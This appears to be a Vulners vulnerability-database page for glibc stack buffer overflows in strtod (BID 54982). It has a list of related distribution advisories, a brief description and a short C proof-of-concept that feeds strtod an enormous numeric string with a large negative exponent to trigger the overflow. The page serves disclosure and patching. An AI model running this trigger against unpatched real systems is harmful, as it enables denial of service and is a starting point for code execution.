GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities
| Reporter | Title | Published | Views | Family All 103 |
|---|---|---|---|---|
| Medium: glibc | 4 Sep 201200:00 | – | amazon | |
| Amazon Linux AMI : glibc (ALAS-2012-120) | 4 Sep 201300:00 | – | nessus | |
| CentOS 5 : glibc (CESA-2012:1207) | 28 Aug 201200:00 | – | nessus | |
| CentOS 6 : glibc (CESA-2012:1208) | 30 Aug 201200:00 | – | nessus | |
| Debian DLA-165-1 : eglibc security update | 26 Mar 201500:00 | – | nessus | |
| Fedora 17 : glibc-2.15-56.fc17 (2012-11927) | 20 Aug 201200:00 | – | nessus | |
| Fedora 16 : glibc-2.14.90-24.fc16.9 (2012-11928) | 28 Aug 201200:00 | – | nessus | |
| Fedora 18 : glibc-2.16-8.fc18 (2012-11963) | 18 Sep 201200:00 | – | nessus | |
| GLSA-201503-04 : GNU C Library: Multiple vulnerabilities (GHOST) | 9 Mar 201500:00 | – | nessus | |
| MiracleLinux 4 : glibc-2.12-1.80.AXS4.5 (AXSA:2012-899:07) | 14 Jan 202600:00 | – | nessus |
10
// source: https://www.securityfocus.com/bid/54982/info
GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition.
include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror ("malloc");
exit (EXIT_FAILURE);
}
p[0] = '1';
memset (p + 1, '0', SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf ("%a\n", d);
exit (EXIT_SUCCESS);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jul 2015 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.6
EPSS0.00993